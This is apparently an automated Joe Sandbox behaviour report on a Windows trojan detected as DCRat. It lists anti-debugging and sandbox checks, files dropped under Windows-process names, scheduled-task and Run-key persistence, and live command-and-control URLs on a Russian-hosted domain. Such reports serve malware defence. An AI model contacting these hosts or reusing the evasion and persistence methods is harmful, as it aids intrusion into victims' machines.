Source: C:\Windows\System32\ddraw\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0071A5F4
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0072B8E0

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0072DD72 VirtualQuery,GetSystemInfo,

0_2_0072DD72

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 599874
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 599765
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 599656
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 599656
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 922337203685477

Source: PMDfwr7Jal.exe, 00000000.00000003.1624592506.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: PMDfwr7Jal.exe, 00000000.00000003.1624592506.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: PMDfwr7Jal.exe, perfCrtmonitorsvcMonitorDll.exe.0.dr, ZyNSmFTtlPIEeiJBfofO.exe.4.dr, ZyNSmFTtlPIEeiJBfofO.exe0.4.dr, dllhost.exe.4.dr, WmiPrvSE.exe.4.dr, ZyNSmFTtlPIEeiJBfofO.exe2.4.dr, ZyNSmFTtlPIEeiJBfofO.exe1.4.dr	Binary or memory string: jLowv5WJhgfsPRryPEQ
Source: WmiPrvSE.exe, 0000000C.00000002.1729006580.000000001BDD0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.1855553723.000000001BBB0000.00000004.00000020.00020000.00000000.sdmp, ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1944329380.000000001B9B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

API call chain: ExitProcess graph end node

graph_0-24373

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0073866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0073866F

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0073753D mov eax, dword ptr fs:[00000030h]

0_2_0073753D

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0073B710 GetProcessHeap,

0_2_0073B710

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072F063 SetUnhandledExceptionFilter,	0_2_0072F063
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0072F22B
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0073866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0073866F
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0072EF05

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\ddraw\dllhost.exe

Network Connect: 141.8.197.42 80

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe "C:\Windows\System32\wbem\schannel\WmiPrvSE.exe"	Jump to behavior

Source: perfCrtmonitorsvcMonitorDll.exe, 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: perfCrtmonitorsvcMonitorDll.exe, 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0072ED5B cpuid

0_2_0072ED5B

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0072A63C

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Queries volume information: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Queries volume information: C:\Windows\System32\ddraw\dllhost.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Queries volume information: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Queries volume information: C:\Windows\System32\ddraw\dllhost.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Queries volume information: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe VolumeInformation

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0072D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0072D5D4

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0071ACF5 GetVersionExW,

0_2_0071ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7720, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7720, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	112 Process Injection	222 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	112 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	37 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PMDfwr7Jal.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
PMDfwr7Jal.exe	74%	Virustotal		Browse
PMDfwr7Jal.exe	100%	Avira	VBS/Runner.VPG
PMDfwr7Jal.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	100%	Avira	HEUR/AGEN.1323343
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Avira	HEUR/AGEN.1323343
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe	100%	Avira	VBS/Runner.VPG
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Avira	HEUR/AGEN.1323343
C:\Windows\System32\ddraw\dllhost.exe	100%	Avira	HEUR/AGEN.1323343
C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323343
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Avira	HEUR/AGEN.1323343
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Avira	HEUR/AGEN.1323343
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	100%	Joe Sandbox ML
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Joe Sandbox ML
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Joe Sandbox ML
C:\Windows\System32\ddraw\dllhost.exe	100%	Joe Sandbox ML
C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Joe Sandbox ML
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	100%	Joe Sandbox ML
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	75%	Virustotal		Browse
C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	75%	Virustotal		Browse
C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe	75%	Virustotal		Browse
C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe	75%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	75%	Virustotal		Browse
C:\Windows\System32\ddraw\dllhost.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\Windows\System32\ddraw\dllhost.exe	75%	Virustotal		Browse
C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Stelega
C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	75%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a0583448.xsph.ru	141.8.197.42	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://a0583448.xsph.ru/HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz	false	high
http://a0583448.xsph.ru/HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF	false	high
http://a0583448.xsph.ru/HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://steamcommunity.com/profiles/	perfCrtmonitorsvcMonitorDll.exe, 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp	false	high
http://a0583448.xsph.ru/HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43a	WmiPrvSE.exe, 0000000C.00000002.1721033162.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000C.00000002.1721033162.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://a0583448.xsph.ru	ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D54000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	perfCrtmonitorsvcMonitorDll.exe, 00000004.00000002.1695236330.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000C.00000002.1721033162.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.1840393239.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D28000.00000004.00000800.00020000.00000000.sdmp	false	high
http://a0583448.xsph.ru/HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2	ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D54000.00000004.00000800.00020000.00000000.sdmp	false	high
http://a0583448.xsph.ru/	ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D28000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.197.42	a0583448.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1414528
Start date and time:	2024-03-23 19:36:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PMDfwr7Jal.exe renamed because original name is a hash value
Original Sample Name:	e1d86c6e52c904e9af8bc1351a66a131.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@22/19@1/1
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 63% Number of executed functions: 382 Number of non-executed functions: 100
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WmiPrvSE.exe, PID 7964 because it is empty
Execution Graph export aborted for target ZyNSmFTtlPIEeiJBfofO.exe, PID 7424 because it is empty
Execution Graph export aborted for target ZyNSmFTtlPIEeiJBfofO.exe, PID 8072 because it is empty
Execution Graph export aborted for target dllhost.exe, PID 5516 because it is empty
Execution Graph export aborted for target dllhost.exe, PID 8036 because it is empty
Execution Graph export aborted for target perfCrtmonitorsvcMonitorDll.exe, PID 7720 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:37:00	Task Scheduler	Run new task: dllhost path: "C:\Windows\System32\ddraw\dllhost.exe"
14:37:00	Task Scheduler	Run new task: WmiPrvSE path: "C:\Windows\System32\wbem\schannel\WmiPrvSE.exe"
14:37:00	Task Scheduler	Run new task: ZyNSmFTtlPIEeiJBfofO path: "C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe"
14:37:03	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Windows\System32\ddraw\dllhost.exe"
14:37:11	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO "C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe"
14:37:19	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Windows\System32\wbem\schannel\WmiPrvSE.exe"
15:37:01	API Interceptor	10x Sleep call for process: WmiPrvSE.exe modified
15:37:13	API Interceptor	5x Sleep call for process: dllhost.exe modified
15:37:21	API Interceptor	5x Sleep call for process: ZyNSmFTtlPIEeiJBfofO.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.197.42	quotation.doc	Get hash	malicious	Unknown	Browse	a0862680.xsph.ru/djlipantro2.1.exe
	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Get hash	malicious	BlackNET	Browse	f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1
	442.111).lnk	Get hash	malicious	Unknown	Browse	a0705880.xsph.ru/selection/seedling.txt
	htmlayout.dll	Get hash	malicious	Unknown	Browse	a0747694.xsph.ru/serv.php
	qRsw2oZH24.exe	Get hash	malicious	Panda Stealer	Browse	crimestreetsru.ru.xsph.ru/collect.php
	svchost.exe	Get hash	malicious	Panda Stealer	Browse	asdqwezxc.ru.xsph.ru/collect.php
	btwGaban.exe	Get hash	malicious	CollectorGoomba, Panda Stealer	Browse	a0680922.xsph.ru/collect.php
	v8YnxUbz23.exe	Get hash	malicious	Amadey RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe
	6CQieC3oMC.exe	Get hash	malicious	Amadey Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe
	Oo8GcnVrGH.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	nMbRell419.exe	Get hash	malicious	AsyncRAT, GMiner, Quasar	Browse	141.8.192.103
	2ctyhHi7vb.exe	Get hash	malicious	AsyncRAT, GMiner, Quasar	Browse	141.8.192.103
	Foldenes.vbs	Get hash	malicious	Remcos, GuLoader	Browse	185.185.71.10
	PortnoyPatti22.pdf.lnk	Get hash	malicious	Remcos, GuLoader	Browse	185.185.71.10
	Arbourvitae.vbs	Get hash	malicious	Remcos, GuLoader	Browse	185.185.71.10
	d.exe	Get hash	malicious	DCRat	Browse	141.8.192.6
	aCh0abLQZr.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	iLhBlKkS3e.exe	Get hash	malicious	DCRat	Browse	141.8.192.193
	5Lcd4B6Nfj.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	gdVgcyMOiq.exe	Get hash	malicious	DCRat	Browse	141.8.192.26

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\PerfLogs\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (766), with no line terminators
Category:	dropped
Size (bytes):	766
Entropy (8bit):	5.8851482364524825
Encrypted:	false
SSDEEP:	12:Lnm9T3+KKfnt43EAa25Orr6JikKLNiEeLqpHTIHFGdj86jRxBzY2+JGuWs:zm5+KKfmUKuJAEempH8H682RjzZK
MD5:	8A1ED421FBC6F8CA02A0361C3EC19382
SHA1:	655D601FE350B1797A89F2ECDC87DC31BA9E1812
SHA-256:	120583AC6355ED01935D0650589B9404499D43E04BB993CDD118BF749D8C5255
SHA-512:	629D6DDAF636CF84E9485C0AFA3F5E4E1C58F0C65E0631B2DF7578B03BAAE4727E555ADB21AD2A946B80308B8FF64FD7C8D9E8297536400830B4227E69807CD7
Malicious:	false
Reputation:	low
